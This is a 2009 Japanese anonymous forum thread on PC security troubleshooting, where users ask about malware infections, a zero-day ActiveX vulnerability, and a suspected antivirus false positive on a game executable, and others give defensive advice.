他にご回答がないようでしたらリカバリしてみようと思います。ありがとうございました。
70:65
09/07/07 14:07:44
失礼しました。
>ピンポイントでIEが起動できなくまる
→HTMLが開けなくなるの間違いです
71:名無しさん@お腹いっぱい。
09/07/07 14:24:20
>>69
> Windowsアップデートによる何かの不具合
ではなく >>65 で自ら書いているように
> 悪意あるマルウェアを削除
が原因になる。
悪意のあるマルウェアに今回のトラブルに関連した重要な部分を
置き換えられていて、それらを削除されたから問題が出た、と。
で、どれを削除されたかも覚えてなく、
(ログはどこかにあった気がするが、削除された数が数だし…)
> Win32モードでは起動できません
この手のトラブルまで起きているならリカバリーした方が早い。
HTMLが開けないだけなら、IEの修復などで直りそうだが。
72:名無しさん@お腹いっぱい。
09/07/07 14:58:13
(ο^д^)ノシ
73:名無しさん@お腹いっぱい。
09/07/07 21:21:14
ポート23015に物凄い勢いでアクセスしている何かがいるんですが
これ何ですか。
IP変えたりしながら5秒毎に来るんですが。
74:名無しさん@お腹いっぱい。
09/07/07 21:43:49
不正アクセスでしょ
75:名無しさん@お腹いっぱい。
09/07/07 21:52:59
いや、それはわかっているんですが、
1時間半で1200件というのは今までになかったんですよ。
特定のポート(23015)だけに5秒毎にアクセスするようなボットとかあるんですかね。
76: ◆N9P3SuvBPo
09/07/07 22:36:41
Microsoft Video ActiveXとかいうのに脆弱性か…
俺の環境では全然影響の無いことですが、他のみんなは気を付けろ。
ゼロデイだから。
URLリンク(headlines.yahoo.co.jp)
77:名無しさん@お腹いっぱい。
09/07/07 22:53:09
/二ニ=-、
/> r-(⌒ヽ⌒ヽ
/ソ ̄/ /\ \ ヽ
// // |\ |\|
/ | ヾ
| ̄|
|万|
|馬|
|券|
|_|
78:名無しさん@お腹いっぱい。
09/07/07 22:54:05
>>76
あなたの環境を教えてください
ここで晒せば少しはRecoveryする奴も減るんじゃね?
79:名無しさん@お腹いっぱい。
09/07/07 22:56:45
IEを使わなければいい
80:名無しさん@お腹いっぱい。
09/07/07 22:59:28
>>76氏
ロムってる者ですが、そういう情報助かります
81: ◆N9P3SuvBPo
09/07/07 23:15:42
>78
とりあえず、XPなら制限ユーザー、Vistaおよび7なら標準ユーザーを常用し、
DEP(データ実行防止)機能を全てのプログラムに対してやっとくこと。
これだけでもかなり違う。
あと件の脆弱性ですが、記事にも書いてあるとおり、
>Windows VistaおよびWindows Server 2008は影響を受けない。
とのことです。
Windows7はどうだろう?
XPモード時だとやはり影響受けるのかな?
82:名無しさん@お腹いっぱい。
09/07/07 23:47:44
scrのファイル踏んでしまった
ファイルのほとんどがT605の拡張子で237kbになってしまった
ほんとにファイルはあぼーんになったの?
どうすればいい?
助けてください。
83: ◆N9P3SuvBPo
09/07/07 23:53:10
>82
マルチはらめぇ!!
84:名無しさん@お腹いっぱい。
09/07/07 23:54:42
WinXP で NortonInternetSecurity を使っています。
ファイヤーウォールに関してなんですが、特定の人物からのアクセスを可能な限り
遮断したいと思っています。 IP単位で指定してブロックはわかるのですが、
リモートホスト名を正規表現で指定してブロックすることができるソフトってありませんか?
そもそも理屈として無理なのかな?とも思うのですが、
似たようなことを実現できる手法・ソフトがあれば教えてください。
85:名無しさん@お腹いっぱい。
09/07/07 23:57:36
なぜ制限ユーザー?
不便じゃね
86:名無しさん@お腹いっぱい。
09/07/08 00:39:00
>>81
IEを使わなければいいだけ
87:名無しさん@お腹いっぱい。
09/07/08 00:42:06
2chからAV女優サイトに飛ばされたらTrojan.Zlob が
入ってしまいました、ノートンは入ってますが反応しません。
朝大量に画面が出てよく分からないままで、どうすればいいか
分かりません、お願いします。
88:名無しさん@お腹いっぱい。
09/07/08 00:47:19
ハ,,ハ
(゚ω゚ ) おこと
⊂ ⊂) ∧_∧
⊂二⌒⊂( ゜Д゜)
γ 二つ つ
{ (
ヽ,_)ヽ,_)
ハ,,ハ ∧_∧
( )∩;;)3゙゚').・:; わり
Oゝ ノ、 O)
/ ) ( \
( / ̄∪ ∪ ̄\)
.゚:。。:.
:゚ _∩゚:・
. ゚:⊂/ ノ )
/ γ
.・ し⌒J
゚。:
ハ,,ハ
( ゚ ω∩ します
ο ノ
/_ O
'(ノ
89:八頭 ◆YAGApwSaEw
09/07/08 01:09:49
>>87
僕が指示を出すから
【ノートン】Norton Internet Security Ver.168【2009】
スレリンク(sec板) へ移動して、
>>2の報告・質問用テンプレートを使って再相談
90:名無しさん@お腹いっぱい。
09/07/08 01:14:53
【使用OS】 『XP SP3』
【PCスペック】 『CPU:1.73GHz 、メモリ:1.49GB
【使用ブラウザ】 『IE8』
【Microsoft Updateの更新の状態】 『自動更新設定』
【セキュリティソフトと年式】 『ウイルスセキュリティzero 2009年』
【回線の種類・ルータの有無】 『光回線でルータ使用中』
【具体的な症状】 ニコニコ動画サイト全体が読み込めない
【過程と措置】ウイルスセキュリティzeroの設定から、「すべての機能を無効にする」にすると普通に見れるようになる。
このまま無効にしておけばよいといいたいところでしょうが、なんか不安なのでこのセキュリティを起動したまま
ニコニコ動画を見れるようにするにはどうしたらよいでしょうか。
【その他】 ようつべは問題なし。
91:名無しさん@お腹いっぱい。
09/07/08 01:18:05
>>90
明日サポートに相談
92:名無しさん@お腹いっぱい。
09/07/08 01:32:44
>>90
つ 取説のトラブルシューティング
93:名無しさん@お腹いっぱい。
09/07/08 01:36:27
>>90
zeroは辞めた方が良いね。人それぞれかも知れないが
サポートも弱いしオススメはしない。しかも完全削除ツールも
無いから残骸が残る。
NIS、マカ辺りが使いやすいと思う。VBは・・・自己責任でw
他にG DATA、KIS他とかもあるが初心者だとどうかな
94:名無しさん@お腹いっぱい。
09/07/08 01:54:24
>>93 同感。2009版以降のスレ見たり、最近の状況を読んでみたらよい。色々書いてあるけど、
自分で判断すればいいっしょ。McAfeeとか、安定してるから使ってみると良いと思うよ。
95:名無しさん@お腹いっぱい。
09/07/08 01:57:51
【使用OS】 『XP MCE SP3』
【PCスペック】 『CPU:C2D1.86GHz 、メモリ:3.00GB
【使用ブラウザ】 『Lunascape 5.0 (Gecko/Trident併用)』
【Microsoft Updateの更新の状態】 『自動更新設定』
【セキュリティソフトと年式】 『KIS 7.0』
【回線の種類・ルータの有無】 『光回線でルータ使用(無線/Macホワイトリストのみ許可/数ポート開放)』
【具体的な症状】
PCつけっぱのまま外出、先ほど帰宅したところ、画面にウイルス警告が出ていた。
検出名:Trojan.Win32.Vapsup.uie
ファイル:C:\Program Files\上海アリス幻樂団\東方地霊殿\th11.exe
【過程と措置】
1.とりあえず削除を選択。
2.対象ディレクトリからファイルが削除されていることを確認。
3.警告ウインドウに出ていたリンクより情報の取得を試みるも、KasperskyLabには該当項目なし。
URLリンク(www.viruslistjp.com)
4.検出名でぐぐってみたところ、ウイルスの別名リストを発見。
URLリンク(www.threatexpert.com)
5.トレンドマイクロのページに主導削除の方法が記載されていた為、実行を試みる。
URLリンク(www.trendmicro.co.jp)
6.ところが、記載されているようなレジストリの値/キーが存在せず、対応ができない。
7.現在Kasperskyのファイルスキャンを実行中。
8.終了次第FScanのオンラインスキャナでのスキャンを実行予定。
続く
96:名無しさん@お腹いっぱい。
09/07/08 01:59:22
【その他】
1.該当ファイルの内容は去年の夏ごろにインストールを行った同人ソフトと考えられる。
2.当然ながら割れ物などではなく、購入先はコミックマーケット(2008年夏)。
3.調べ方が正しいのであれば、該当のウイルスは単体のワームであり、ファイルへの感染は行わない。
4.大手サークルの頒布物であり、現在までウイルス情報もなく、CDにウイルスが入っているとは考えにくい。
5.去年の夏に頒布されたものである為、今になってウイルスとして検出されるとは考えにくい。
現在、以上のような状態になっていますが、本当にこの調べ方/対応方法であっているかどうか、素人の為判断がつきません。
セキュリティについて詳しい皆さんであれば、同様のケースに対する情報等お持ちではないかと思い、ご相談させていただきました。
97:八頭 ◆YAGApwSaEw
09/07/08 02:21:04
>>95-96
駆除に関しては問題無いみたいだけど(半年以上検出しなかったのは問題だけど・・・)
文章からして誤検出と判断しているんだろうけども
このケースは意図的な大量配布の可能性もあると思う。
>>6のIPA情報処理推進機構 (情報セキュリティに関する届出) へ連絡を取って調べてもらうのがいいと思う
*コンピュータウイルスの相談窓口としてコンピュータウイルス110番の電話を設置
なるべく多くのセキュリティベンダへ検体提出してもらうのがいいと思う。
98:名無しさん@お腹いっぱい。
09/07/08 02:25:32
地霊殿てのが微妙な……
まあ、VB2007でもth11.exeが隔離されると言う現象があったらしいですが。
ご使用のソフトは、カスペルスキーですね?
スレリンク(gamestg板:644-645番)
ここの情報から更新後、ウイルスとして検出された可能性もあります。
VTで該当ファイルを検査されるとはっきりすると思いますが。
COMODO、Aviraでも同様に、th11.exeの検出報告が相次いでいるようです。
99:名無しさん@お腹いっぱい。
09/07/08 02:27:37
そんなもんでオタオタする奴がなんで
>数ポート開放) してんのよ ?
100:八頭 ◆YAGApwSaEw
09/07/08 02:39:03
某ブログにF-Secureのオンラインスキャンでも同パスの検出例があった
Symantecへは連絡だけしておきました
101:名無しさん@お腹いっぱい。
09/07/08 02:41:17
>>100
GENOの感染経歴もある人のBLOGなら
同じところみましたね。
102:名無しさん@お腹いっぱい。
09/07/08 02:43:12
>>97
>>98
貴重な情報有難うございます。
先ほど検出可否報告スレよりウイルス詰め合わせをダウンロードし検出テストを行った結果、
KAV使用の別の方が検出を行ったものと同数のファイルが検出されました為、
少なくともローカルのKAVの検出機能に障害は発生していないようです。
恐らく皆さんがおっしゃるように語検出ではないかと思いますが、
念の為地霊殿再インストールの後、exeを検体としてIPAに提出しようかと思います。
助言いただき有難うございました。
>>99
使用しているポートは絞っており、ポートスキャンにより他のサービスが動いていないことを確認済みです。
しかしながら、セキュリティに関して絶対の自信を持っているわけではないので、
自分以外の信用が置けるソースからの情報が得られないと不安でなりません。
自分の調べ方に不足が合ったようで、お手数をおかけ申し訳ございませんでした。
重ね重ね有難うございました。
次ページ最新レス表示スレッドの検索類似スレ一覧話題のニュースおまかせリスト▼オプションを表示暇つぶし2ch
5370日前に更新/260 KB
担当:undef